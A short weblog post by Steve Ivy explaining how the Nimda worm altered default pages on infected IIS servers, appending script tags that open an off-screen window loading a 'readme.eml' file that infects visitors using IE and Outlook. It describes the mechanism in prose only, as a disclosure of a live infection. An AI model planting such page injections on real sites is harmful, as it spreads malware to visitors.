monkinetic weblog

Steve Ivy's Weblog - Since 1999 - XII Ed.

Nimda Web Page Exploit Details

Ok, I found an infected site. (I notified the webmaster, who was already aware of the situation. The site is now down.) Anyway, here's the skinny:

Nimda presumably uses IIS's ability to add footers to HTML documents. Once it infects a server running IIS, it appears to add two new lines to the default document ("/", default.[asp,htm]), after the original <html>…</html> element. Each line is another <html> tag, containing a single <script tag. The tag opens a new window at coordinates 6000,6000 (way off the screen). The "src" attribute points to the virus file, "readme.eml". If IE is reading the page, it will probably try to open the .eml file (a saved email from Outlook) in the default viewer – Outlook. Doing so will run the virus, and the host will now be infected. Naaaaaasty.

Posted by

My name is Steve Ivy and I write about technology, the open web, social software, and general nerdity on monkinetic.com. You should follow me on Twitter or subscribe to this blog if you like what you're reading. I spend my days hacking Movable Type, python, Django, and various other efforts at Wallrazer. This is my personal site.